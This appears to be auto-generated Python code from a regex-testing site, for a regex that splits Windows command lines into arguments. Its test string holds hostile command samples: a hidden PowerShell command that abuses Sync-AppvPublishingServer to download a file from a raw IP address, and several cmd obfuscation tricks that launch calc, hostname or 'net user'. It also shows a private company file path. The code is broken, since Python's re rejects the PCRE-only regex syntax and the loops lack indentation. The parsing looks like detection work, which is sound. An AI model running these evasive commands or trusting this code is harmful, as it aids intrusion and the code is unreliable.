import re
regex = re.compile((r"(?#\\n"
r"Doc: This regex will split the commandline in arguments\n\n"
r"Details:\n"
r" The arg variable will contain all the different arguments\n"
r" argument delimiters are in two categories :\n"
r" whitespaces delimiters : \t \n \r \v ' '\n"
r" ',' : is a delimiter in the windows cmd \n"
r" but it's not one in the powershell\n"
r" quotation delimiters : \' \` \"\n\n"
r"Variables:\n"
r" arg : will contain each argument\n"
r"Next variables can be adjusted by adding or deleting delimiters\n"
r" quote_delimiters : quoted argument delimiters\n"
r" whitespace_delimiters : whitespace argument delimiters\n\n"
r")(?#\\n"
r")(?<arg>(?#\\n"
r" )(?<arg_quote>(?#\\n"
r" )(?<quote_delimiters>\"|'|`)(?#\\n"
r" )(?:(?#\\n"
r" )(?!\3)(?#\\n"
r" )(?<escape>(?(?!\\)[\x00-\xFF]|[\x00-\xFF]{2}))(?#\\n"
r" ))*(?#\\n"
r" )\3(?#\\n"
r" ))|(?<arg_whitespace>(?#\\n"
r" )(?:(?#\\n"
r" )(?!(?#\\n"
r" )(?<whitespace_delimiters>\s|$)|(?#\\n"
r" )(?P>quote_delimiters)(?#\\n"
r" ))(?#\\n"
r" )(?P>escape)(?#\\n"
r" ))+(?#\\n"
r" ))(?#\\n"
r"))(?#\\n"
r")(?#\\n"
r")(?#\\n"
r"Related doc:\n"
r" https://docs.microsoft.com/fr-fr/cpp/c-language/parsing-c-command-line-arguments?view=vs-2019\n"
r" http://daviddeley.com/autohotkey/parameters/parameters.htm\n"
r")"), flags=re.MULTILINE)
test_str = ("\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" --type=renderer /prefetch:1 \"R:\\Coficine\\MCI\\01 Activités\\03 PARTICIPATIONS\\2 Sociétés\\1 Particip. actuelles\\Monello Productions\\03. Dossier client\\01. KYC\\Actionnariat\\Actionnariat - 2018-05-03.pdf\"\n\n"
"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer \\n;(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;Invoke-WebRequest -Uri http://209.97.141.246/ee/index_files/alert.css}\n\n"
"\"UNIT TESTS :\"\n\n"
"''\n"
" arg0\\ \\ \\\\ \"arg1\\\"\\\"\" \"arg2\\\"\\\\\"\"arg3 \\\"\" 'arg4\"arg4\"' arg5 arg6 \n\n"
" space_bef_and_aft__arg0 arg1 arg2 arg3 \n"
"space_aft___________arg0 arg1 arg2 arg3 \n"
" space_bef__________arg0 arg1 arg2 arg3\n"
"nospace_____________arg0 arg1 arg2 arg3\n\n"
" multispace______________arg0 arg1 arg2 arg3 arg4 \n\n"
" C:\\ProgramData\\Anaconda3\\python.exe C:\\ProgramData\\Anaconda3\\cwp.py C:\\ProgramData\\Anaconda3 C:\\ProgramData\\Anaconda3\\python.exe C:\\ProgramData\\Anaconda3\\Scripts\\jupyter-notebook-script.py \"%USERPROFILE%/\" \n\n"
".\n\n"
"`echo `ls \"/tmp\"``'``'\n\n"
"1\"\"3\"4\"\n\n"
"n^e^t u^s^er\n\n"
"cmd /c \"set x=calc & echo %x% | cmd\"\n"
"cmd /c \"set x=c@alc & echo %x:@=mantvydas% | cmd\"\n\n"
"\\c \\\\ \\' \\\" '\\'\\'\\'\\'\\'\\'\\'\\\\' \n\n"
"'# this will take the C character from %programdata% and will launch the cmd prompt'\n"
"%programdata:~0,1%md \\c \"whatever\"\n\n"
"@cmd\n"
"set pSM \n"
"PSModulePath=C:\\Users\\mantvydas\\Documents\\WindowsPowerShell\\Modules;....\n\n"
"FOR /F \"tokens=7 delims=s\\\\\" %g IN ('set^|findstr PSM') do %g\n\n"
"cmd,/c;hostname\n\n\n\n\n\n")
matches = regex.finditer(test_str)
for match_num, match in enumerate(matches, start=1):
print(f"Match {match_num} was found at {match.start()}-{match.end()}: {match.group()}")
for group_num, group in enumerate(match.groups(), start=1):
print(f"Group {group_num} found at {match.start(group_num)}-{match.end(group_num)}: {group}")
Please keep in mind that these code samples are automatically generated and are not guaranteed to work. If you find any syntax errors, feel free to submit a bug report. For a full regex reference for Python, please visit: https://docs.python.org/3/library/re.html